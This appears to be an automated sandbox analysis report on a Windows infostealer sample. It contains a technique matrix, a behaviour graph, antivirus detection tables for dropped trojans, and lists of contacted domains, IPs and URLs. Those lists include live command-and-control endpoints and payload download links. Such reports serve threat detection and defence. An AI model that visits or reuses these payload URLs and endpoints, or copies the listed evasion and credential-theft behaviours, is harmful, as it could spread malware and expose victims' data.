                              Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                              IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron381
                              Virtualization/Sandbox Evasion
                              Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                              Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd212
                              Process Injection
                              Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                              Hide Legend

                              Legend:

                              • Process
                              • Signature
                              • Created File
                              • DNS/IP Info
                              • Is Dropped
                              • Is Windows Process
                              • Number of created Registry Values
                              • Number of created Files
                              • Visual Basic
                              • Delphi
                              • Java
                              • .Net C# or VB.NET
                              • C, C++ or other language
                              • Is malicious
                              • Internet
                              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1579352 Sample: file.exe Startdate: 21/12/2024 Architecture: WINDOWS Score: 100 110 toptek.sbs 2->110 112 sweepyribs.lat 2->112 114 8 other IPs or domains 2->114 148 Suricata IDS alerts for network traffic 2->148 150 Found malware configuration 2->150 152 Antivirus detection for dropped file 2->152 154 21 other signatures 2->154 10 skotes.exe 4 79 2->10         started        15 file.exe 5 2->15         started        17 ed7d415177.exe 2->17         started        19 5 other processes 2->19 signatures3 process4 dnsIp5 140 185.215.113.43, 49758, 49764, 49786 WHOLESALECONNECTIONSNL Portugal 10->140 142 185.215.113.16 WHOLESALECONNECTIONSNL Portugal 10->142 144 31.41.244.11, 49770, 49791, 49793 AEROEXPRESS-ASRU Russian Federation 10->144 96 C:\Users\user\AppData\...\178ba86573.exe, PE32 10->96 dropped 98 C:\Users\user\AppData\...\796ecf2647.exe, PE32 10->98 dropped 100 C:\Users\user\AppData\...\62a707bc2a.exe, PE32 10->100 dropped 108 32 other malicious files 10->108 dropped 198 Creates multiple autostart registry keys 10->198 200 Hides threads from debuggers 10->200 202 Tries to detect sandboxes / dynamic malware analysis system (registry check) 10->202 21 d0e32932f8.exe 10->21         started        26 81d22383f9.exe 8 10->26         started        28 74b92d58dc.exe 10->28         started        32 8 other processes 10->32 102 C:\Users\user\AppData\Local\...\skotes.exe, PE32 15->102 dropped 104 C:\Users\user\...\skotes.exe:Zone.Identifier, ASCII 15->104 dropped 204 Detected unpacking (changes PE section rights) 15->204 206 Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors) 15->206 208 Tries to evade debugger and weak emulator (self modifying code) 15->208 210 Tries to detect virtualization through RDTSC time measurements 15->210 30 skotes.exe 15->30         started        106 C:\...\STNCYC18XSKVTIXIDORVU8IVIC8XE.exe, PE32 17->106 dropped 212 Query firmware table information (likely to detect VMs) 17->212 214 Tries to steal Crypto Currency Wallets 17->214 216 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 17->216 146 127.0.0.1 unknown unknown 19->146 218 Binary is likely a compiled AutoIt script file 19->218 file6 signatures7 process8 dnsIp9 122 185.215.113.206 WHOLESALECONNECTIONSNL Portugal 21->122 78 C:\Users\user\Documents\KEGDAKEHJD.exe, PE32 21->78 dropped 80 C:\Users\user\AppData\...\softokn3[1].dll, PE32 21->80 dropped 92 12 other files (8 malicious) 21->92 dropped 172 Drops PE files to the document folder of the user 21->172 174 Tries to steal Mail credentials (via file / registry access) 21->174 176 Found many strings related to Crypto-Wallets (likely being stolen) 21->176 192 6 other signatures 21->192 34 chrome.exe 21->34         started        124 github.com 20.233.83.145, 443, 49802, 49803 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 26->124 126 raw.githubusercontent.com 185.199.110.133, 443, 49806, 49807 FASTLYUS Netherlands 26->126 82 C:\...\fb22de53cd93474896e72899203b572f.exe, PE32 26->82 dropped 84 C:\...\bb31c9d4a53941b6b913f33980d23feb.exe, PE32 26->84 dropped 178 Multi AV Scanner detection for dropped file 26->178 180 Adds a directory exclusion to Windows Defender 26->180 36 bb31c9d4a53941b6b913f33980d23feb.exe 26->36         started        40 powershell.exe 26->40         started        42 powershell.exe 26->42         started        50 2 other processes 26->50 128 cheapptaxysu.click 104.21.67.146 CLOUDFLARENETUS United States 28->128 182 Query firmware table information (likely to detect VMs) 28->182 184 Tries to detect sandboxes and other dynamic analysis tools (window names) 28->184 186 Tries to harvest and steal ftp login credentials 28->186 188 Detected unpacking (changes PE section rights) 30->188 194 2 other signatures 30->194 130 twentytk20ht.top 185.121.15.192 REDSERVICIOES Spain 32->130 132 discokeyus.lat 104.21.21.99 CLOUDFLARENETUS United States 32->132 134 3 other IPs or domains 32->134 86 C:\Users\user\AppData\...\service123.exe, PE32 32->86 dropped 88 C:\Users\...\O36B9WQQ11YC67FWH57AOX5NF.exe, PE32 32->88 dropped 90 C:\Users\user\AppData\Local\...\Y-Cleaner.exe, PE32 32->90 dropped 94 6 other files (4 malicious) 32->94 dropped 190 Binary is likely a compiled AutoIt script file 32->190 196 9 other signatures 32->196 44 85746525a0.exe 32->44         started        46 firefox.exe 32->46         started        48 cmd.exe 32->48         started        52 9 other processes 32->52 file10 signatures11 process12 dnsIp13 54 chrome.exe 34->54         started        116 toptek.sbs 94.130.188.57 HETZNER-ASDE Germany 36->116 118 t.me 149.154.167.99 TELEGRAMRU United Kingdom 36->118 156 Attempt to bypass Chrome Application-Bound Encryption 36->156 158 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 36->158 160 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 36->160 162 Tries to harvest and steal browser information (history, passwords, etc) 36->162 56 chrome.exe 36->56         started        164 Loading BitLocker PowerShell Module 40->164 59 conhost.exe 40->59         started        61 conhost.exe 42->61         started        120 pancakedipyps.click 172.67.209.202, 443, 49794, 49795 CLOUDFLARENETUS United States 44->120 166 Query firmware table information (likely to detect VMs) 44->166 168 Found many strings related to Crypto-Wallets (likely being stolen) 44->168 170 Tries to steal Crypto Currency Wallets 44->170 63 firefox.exe 46->63         started        69 2 other processes 48->69 65 conhost.exe 52->65         started        67 conhost.exe 52->67         started        71 4 other processes 52->71 signatures14 process15 dnsIp16 136 239.255.255.250 unknown Reserved 56->136 73 chrome.exe 56->73         started        76 firefox.exe 63->76         started        process17 dnsIp18 138 www.google.com 142.250.181.132 GOOGLEUS United States 73->138

                              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                              windows-stand
                              SourceDetectionScannerLabelLink
                              file.exe57%VirustotalBrowse
                              file.exe53%ReversingLabsWin32.Infostealer.Tinba
                              file.exe100%AviraTR/Crypt.TPM.Gen
                              file.exe100%Joe Sandbox ML
                              SourceDetectionScannerLabelLink
                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[2].exe100%AviraTR/Crypt.TPM.Gen
                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[2].exe100%AviraHEUR/AGEN.1320706
                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[2].exe100%AviraTR/ATRAPS.Gen
                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[3].exe100%AviraTR/Crypt.XPACK.Gen
                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[3].exe100%AviraTR/Crypt.TPM.Gen
                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe100%AviraTR/Crypt.TPM.Gen
                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[4].exe100%Joe Sandbox ML
                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[2].exe100%Joe Sandbox ML
                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[2].exe100%Joe Sandbox ML
                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[4].exe100%Joe Sandbox ML
                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[3].exe100%Joe Sandbox ML
                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe100%Joe Sandbox ML
                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe100%Joe Sandbox ML
                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[2].exe100%Joe Sandbox ML
                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[3].exe100%Joe Sandbox ML
                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[3].exe100%Joe Sandbox ML
                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe100%Joe Sandbox ML
                              C:\ProgramData\freebl3.dll0%ReversingLabs
                              C:\ProgramData\mozglue.dll0%ReversingLabs
                              C:\ProgramData\msvcp140.dll0%ReversingLabs
                              C:\ProgramData\nss3.dll0%ReversingLabs
                              C:\ProgramData\softokn3.dll0%ReversingLabs
                              C:\ProgramData\vcruntime140.dll0%ReversingLabs
                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\dll[1]0%ReversingLabs
                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe22%ReversingLabs
                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[4].exe55%ReversingLabsWin32.Infostealer.Tinba
                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe57%ReversingLabsByteCode-MSIL.Trojan.Zilla
                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\random[3].exe47%ReversingLabsWin32.Trojan.Generic
                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\random[4].exe63%ReversingLabsWin32.Ransomware.Generic
                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\random[5].exe28%ReversingLabs
                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\freebl3[1].dll0%ReversingLabs
                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\mozglue[1].dll0%ReversingLabs
                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\msvcp140[1].dll0%ReversingLabs
                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\nss3[1].dll0%ReversingLabs
                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[1].exe68%ReversingLabsWin32.Trojan.LummaStealer
                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[3].exe87%ReversingLabsWin32.Trojan.Amadey
                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[4].exe53%ReversingLabsWin32.Infostealer.Tinba
                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\soft[1]75%ReversingLabsByteCode-MSIL.Trojan.Malgent
                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\softokn3[1].dll0%ReversingLabs
                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\vcruntime140[1].dll0%ReversingLabs
                              C:\Users\user\AppData\Local\Temp\1019663001\a2870b1ac5.exe22%ReversingLabs
                              C:\Users\user\AppData\Local\Temp\1019664001\85746525a0.exe68%ReversingLabsWin32.Trojan.LummaStealer
                              C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exe57%ReversingLabsByteCode-MSIL.Trojan.Zilla
                              C:\Users\user\AppData\Local\Temp\1019674001\fdd59fd4bc.exe87%ReversingLabsWin32.Trojan.Amadey
                              C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exe47%ReversingLabsWin32.Trojan.Generic
                              C:\Users\user\AppData\Local\Temp\1019676001\6cc6a39605.exe55%ReversingLabsWin32.Infostealer.Tinba
                              C:\Users\user\AppData\Local\Temp\1019677001\fbaaecbd82.exe63%ReversingLabsWin32.Ransomware.Generic
                              C:\Users\user\AppData\Local\Temp\1019679001\cd81608004.exe28%ReversingLabs
                              C:\Users\user\AppData\Local\Temp\1019680001\92aba5cf15.exe57%ReversingLabsByteCode-MSIL.Trojan.Zilla
                              C:\Users\user\AppData\Local\Temp\1019682001\62a707bc2a.exe22%ReversingLabs
                              C:\Users\user\AppData\Local\Temp\1019683001\796ecf2647.exe68%ReversingLabsWin32.Trojan.LummaStealer
                              C:\Users\user\AppData\Local\Temp\Ae01fdzV5f53ffefSw3BEvKVeV\Bunifu_UI_v1.5.3.dll0%ReversingLabs
                              C:\Users\user\AppData\Local\Temp\Ae01fdzV5f53ffefSw3BEvKVeV\Y-Cleaner.exe75%ReversingLabsByteCode-MSIL.Trojan.Malgent
                              C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe53%ReversingLabsWin32.Infostealer.Tinba
                              C:\Users\user\AppData\Local\Temp\main\7z.dll0%ReversingLabs
                              C:\Users\user\AppData\Local\Temp\main\7z.exe0%ReversingLabs
                              No Antivirus matches
                              SourceDetectionScannerLabelLink
                              discokeyus.lat0%URL Reputationsafe
                              grannyejh.lat0%URL Reputationsafe
                              No Antivirus matches
                              NameIPActiveMaliciousAntivirus DetectionReputation
                              pancakedipyps.click
                              172.67.209.202
                              truefalse
                                high
                                cheapptaxysu.click
                                104.21.67.146
                                truetrue
                                  github.com
                                  20.233.83.145
                                  truefalse
                                    toptek.sbs
                                    94.130.188.57
                                    truetrue
                                      raw.githubusercontent.com
                                      185.199.110.133
                                      truefalse
                                        t.me
                                        149.154.167.99
                                        truefalse
                                          discokeyus.lat
                                          104.21.21.99
                                          truetrue
                                          • 0%, URL Reputation
                                          www.google.com
                                          142.250.181.132
                                          truefalse
                                            home.twentytk20ht.top
                                            185.121.15.192
                                            truetrue
                                              twentytk20ht.top
                                              185.121.15.192
                                              truetrue
                                                httpbin.org
                                                34.226.108.155
                                                truefalse
                                                  sweepyribs.lat
                                                  unknown
                                                  unknowntrue
                                                    grannyejh.lat
                                                    unknown
                                                    unknowntrue
                                                    • 0%, URL Reputation
                                                    NameMaliciousAntivirus DetectionReputation
                                                    http://185.215.113.206/true
                                                      http://home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850?argument=qVzcqauEInmPu2zy1734815809true
                                                        http://185.215.113.206/68b591d6548ec281/nss3.dlltrue
                                                          grannyejh.lattrue
                                                            https://httpbin.org/ipfalse
                                                              https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgwfalse
                                                                https://raw.githubusercontent.com/Urijas/moperats/refs/heads/main/ktyihkdfesf.exefalse
                                                                  https://toptek.sbs/true
                                                                    https://t.me/k04aelfalse
                                                                      http://185.215.113.43/Zu7JuNko/index.phptrue
                                                                        NameSourceMaliciousAntivirus DetectionReputation
                                                                        https://developer.mozilla.org/en-US/Add-ons/WebExtensions/manifest.json/commands#Key_combinationsLisfirefox.exe, 00000030.00000002.3537155261.000002238A703000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          https://play.google.com/store/apps/details?id=org.mozilla.firefox.vpn&referrer=utm_source%3Dfirefox-firefox.exe, 00000030.00000002.3614866443.000002238B740000.00000002.08000000.00040000.00000000.sdmpfalse
                                                                            https://discokeyus.lat/Ved7d415177.exe, 00000018.00000003.3484637549.0000000000958000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              http://schemas.datacontract.orgfb22de53cd93474896e72899203b572f.exe, 00000016.00000002.3019233225.0000015C0891F000.00000004.00000800.00020000.00000000.sdmp, fb22de53cd93474896e72899203b572f.exe, 00000016.00000002.3019233225.0000015C08C4E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                https://ac.duckduckgo.com/ac/internal:privateBrowsingAllowedprincipalToInherit_base64Wikipediafirefox.exe, 00000030.00000002.3537155261.000002238A77C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  https://services.addons.mozilla.org/api/v5/addons/browser-mappings/?browser=%BROWSER%firefox.exe, 00000030.00000002.3614866443.000002238B740000.00000002.08000000.00040000.00000000.sdmpfalse
                                                                                    https://discokeyus.lat/Led7d415177.exe, 00000018.00000003.3146093450.00000000053C6000.00000004.00000800.00020000.00000000.sdmp, ed7d415177.exe, 00000018.00000003.3146695832.00000000053CC000.00000004.00000800.00020000.00000000.sdmp, ed7d415177.exe, 0000001E.00000003.3594435833.00000000017E4000.00000004.00000020.00020000.00000000.sdmp, ed7d415177.exe, 0000001E.00000003.3652544592.00000000017E4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      https://discokeyus.lat/jed7d415177.exe, 00000018.00000003.3595900652.0000000000958000.00000004.00000020.00020000.00000000.sdmp, ed7d415177.exe, 00000018.00000003.3539577851.0000000000958000.00000004.00000020.00020000.00000000.sdmp, ed7d415177.exe, 00000018.00000003.3484637549.0000000000958000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        https://discokeyus.lat/ced7d415177.exe, 00000018.00000003.3539577851.0000000000958000.00000004.00000020.00020000.00000000.sdmp, ed7d415177.exe, 00000018.00000003.3484637549.0000000000958000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          https://spocs.getpocket.com/spocsfirefox.exe, 00000030.00000002.3592510223.000002238B513000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000002.3644428324.000002238C781000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            https://screenshots.firefox.comfirefox.exe, 00000030.00000002.3462121451.0000022389EF8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000002.3644428324.000002238C7E3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000002.3537155261.000002238A703000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              https://g.live.com/odclientsettings/Prod.C:svchost.exe, 00000017.00000003.2851825660.0000019CC52FF000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000017.00000003.2851825660.0000019CC520E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                https://ads.stickyadstv.com/firefox-etpfirefox.exe, 00000030.00000002.3537155261.000002238A703000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  https://versioncheck-bg.addons.mozilla.org/update/VersionCheck.php?reqVersion=%REQ_VERSION%&id=%ITEMfirefox.exe, 00000030.00000002.3614866443.000002238B740000.00000002.08000000.00040000.00000000.sdmpfalse
                                                                                                    https://xhr.spec.whatwg.org/#sync-warningfirefox.exe, 00000030.00000002.3506483524.000002238A62D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000002.3506483524.000002238A613000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      https://www.amazon.com/exec/obidos/external-search/firefox.exe, 00000030.00000002.3537155261.000002238A703000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000003.3312453813.000002238E33C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000003.3312834408.000002238E35A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        https://firefox.settings.services.mozilla.com/v1chrome://browser/content/browser.xhtmlParentfirefox.exe, 00000030.00000002.3537155261.000002238A703000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          https://profiler.firefox.com/firefox.exe, 00000030.00000002.3644428324.000002238C781000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            https://github.com/mozilla-services/screenshotsfirefox.exe, 00000030.00000003.3313163016.000002238E377000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000003.3312075480.000002238E31F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000003.3311874121.000002238E100000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000002.3537155261.000002238A77C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000003.3312453813.000002238E33C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000003.3312834408.000002238E35A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              https://tracking-protection-issues.herokuapp.com/newfirefox.exe, 00000030.00000002.3614866443.000002238B740000.00000002.08000000.00040000.00000000.sdmpfalse
                                                                                                                https://discokeyus.lat/apiLTed7d415177.exe, 0000001E.00000003.3595404950.000000000176F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  https://raw.githubusercontent.comD81d22383f9.exe, 0000000C.00000002.2903368169.0000000002474000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    https://developer.mozilla.org/en-US/docs/Glossary/speculative_parsingfirefox.exe, 00000030.00000002.3506483524.000002238A62D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000002.3506483524.000002238A613000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      https://profiler.firefox.comlocationsForBackgroundTaskNamedregisterModulesProtocolHandler/backgroundfirefox.exe, 00000030.00000002.3537155261.000002238A77C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/fingerprinters-reportfirefox.exe, 00000030.00000002.3614866443.000002238B740000.00000002.08000000.00040000.00000000.sdmpfalse
                                                                                                                          http://exslt.org/commonfirefox.exe, 00000030.00000002.3447488113.0000022389D26000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            https://addons.mozilla.org/%LOCALE%/%APP%/blocked-addon/%addonID%/%addonVersion%/firefox.exe, 00000030.00000002.3614866443.000002238B740000.00000002.08000000.00040000.00000000.sdmpfalse
                                                                                                                              http://exslt.org/dates-and-timesfirefox.exe, 00000030.00000002.3447488113.0000022389D61000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&ctaed7d415177.exe, 00000018.00000003.3248441789.00000000053DC000.00000004.00000800.00020000.00000000.sdmp, d0e32932f8.exe, 0000001A.00000002.3668631588.000000000078F000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000030.00000002.3592510223.000002238B545000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000002.3447488113.0000022389DAD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000002.3644428324.000002238C781000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000002.3592510223.000002238B563000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  http://win.mail.ru/cgi-bin/sentmsg?mailto=%sfirefox.exe, 00000030.00000002.3491063189.000002238A382000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000002.3537155261.000002238A77C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    https://www.ecosia.org/newtab/85746525a0.exe, 0000000B.00000003.2609953501.000000000330C000.00000004.00000800.00020000.00000000.sdmp, 85746525a0.exe, 0000000B.00000003.2610601539.000000000330A000.00000004.00000800.00020000.00000000.sdmp, bb31c9d4a53941b6b913f33980d23feb.exe, 00000015.00000003.3326235678.000000000374A000.00000004.00000020.00020000.00000000.sdmp, ed7d415177.exe, 00000018.00000003.3065381407.000000000540D000.00000004.00000800.00020000.00000000.sdmp, d0e32932f8.exe, 0000001A.00000003.3344064929.00000000007EC000.00000004.00000020.00020000.00000000.sdmp, ed7d415177.exe, 0000001E.00000003.3232703151.0000000005F09000.00000004.00000800.00020000.00000000.sdmp, ed7d415177.exe, 0000001E.00000003.3230377268.0000000005F0B000.00000004.00000800.00020000.00000000.sdmp, ed7d415177.exe, 0000001E.00000003.3231602649.0000000005F09000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      https://getpocket.cdn.mozilla.net/v3/firefox/global-recs?version=3&consumer_key=$apiKey&locale_lang=firefox.exe, 00000030.00000002.3644428324.000002238C781000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000002.3592510223.000002238B563000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        https://bugzilla.mofirefox.exe, 00000030.00000002.3676285099.000002238E06F000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          https://mitmdetection.services.mozilla.com/firefox.exe, 00000030.00000002.3614866443.000002238B740000.00000002.08000000.00040000.00000000.sdmpfalse
                                                                                                                                            http://foo/Resources/StoreLogo.Light.pngfb22de53cd93474896e72899203b572f.exe, 00000016.00000002.3019233225.0000015C0899D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              https://static.adsafeprotected.com/firefox-etp-jsfirefox.exe, 00000030.00000002.3537155261.000002238A703000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                https://spocs.getpocket.com/firefox.exe, 00000030.00000002.3644428324.000002238C781000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000030.00000002.3592510223.000002238B563000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                  https://services.addons.mozilla.org/api/v4/abuse/report/addon/firefox.exe, 00000030.00000002.3614866443.000002238B740000.00000002.08000000.00040000.00000000.sdmpfalse
                                                                                                                                                    https://services.addons.mozilla.org/api/v4/addons/search/?guid=%IDS%&lang=%LOCALE%firefox.exe, 00000030.00000002.3614866443.000002238B740000.00000002.08000000.00040000.00000000.sdmpfalse
                                                                                                                                                      https://color.firefox.com/?utm_source=firefox-browser&utm_medium=firefox-browser&utm_content=theme-ffirefox.exe, 00000030.00000002.3614866443.000002238B740000.00000002.08000000.00040000.00000000.sdmpfalse
                                                                                                                                                        http://html4/loose.dtd932bb971c3.exe, 00000013.00000003.2710774337.0000000007510000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                          https://addons.mozilla.orgpictureinpicture.toggle_enabledError:firefox.exe, 00000030.00000002.3537155261.000002238A703000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                            https://monitor.firefox.com/user/breach-stats?includeResolved=truefirefox.exe, 00000030.00000002.3614866443.000002238B740000.00000002.08000000.00040000.00000000.sdmpfalse
                                                                                                                                                              https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/cross-site-tracking-reportfirefox.exe, 00000030.00000002.3614866443.000002238B740000.00000002.08000000.00040000.00000000.sdmpfalse
                                                                                                                                                                https://outlook.live.com/default.aspx?rru=compose&to=%sresource://gre/modules/handlers/HandlerList.sfirefox.exe, 00000030.00000002.3537155261.000002238A77C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                  http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#85746525a0.exe, 00000009.00000002.2559681512.0000000000B3D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    https://monitor.firefox.com/aboutfirefox.exe, 00000030.00000002.3614866443.000002238B740000.00000002.08000000.00040000.00000000.sdmpfalse
                                                                                                                                                                      https://support.mozilla.orghttps://truecolors.firefox.combrowser.urlbar.openViewOnFocusbrowser.migrafirefox.exe, 00000030.00000002.3537155261.000002238A703000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                        http://x1.c.lencr.org/085746525a0.exe, 0000000B.00000003.2757106362.00000000032F5000.00000004.00000800.00020000.00000000.sdmp, ed7d415177.exe, 00000018.00000003.3234150760.00000000053FE000.00000004.00000800.00020000.00000000.sdmp, ed7d415177.exe, 0000001E.00000003.3334747442.0000000005F09000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                          http://x1.i.lencr.org/085746525a0.exe, 0000000B.00000003.2757106362.00000000032F5000.00000004.00000800.00020000.00000000.sdmp, ed7d415177.exe, 00000018.00000003.3234150760.00000000053FE000.00000004.00000800.00020000.00000000.sdmp, ed7d415177.exe, 0000001E.00000003.3334747442.0000000005F09000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                            https://firefox.settings.services.mozilla.com/v1chrome://browser/content/browser.xhtmlfirefox.exe, 00000030.00000002.3537155261.000002238A703000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                              http://compose.mail.yahoo.co.jp/ym/Compose?To=%shttp://poczta.interia.pl/mh/?mailto=%shttp://www.inbfirefox.exe, 00000030.00000002.3537155261.000002238A77C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                http://win.mail.ru/cgi-bin/sentmsg?mailto=%shttps://mail.yahoo.co.jp/compose/?To=%sfirefox.exe, 00000030.00000002.3537155261.000002238A77C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                  https://support.mozilla.org/products/firefoxgro.alled7d415177.exe, 0000001E.00000003.3379230947.0000000005FE5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                    http://.jpg932bb971c3.exe, 00000013.00000003.2710774337.0000000007510000.00000004.00001000.00020000.00000000.sdmpfalse
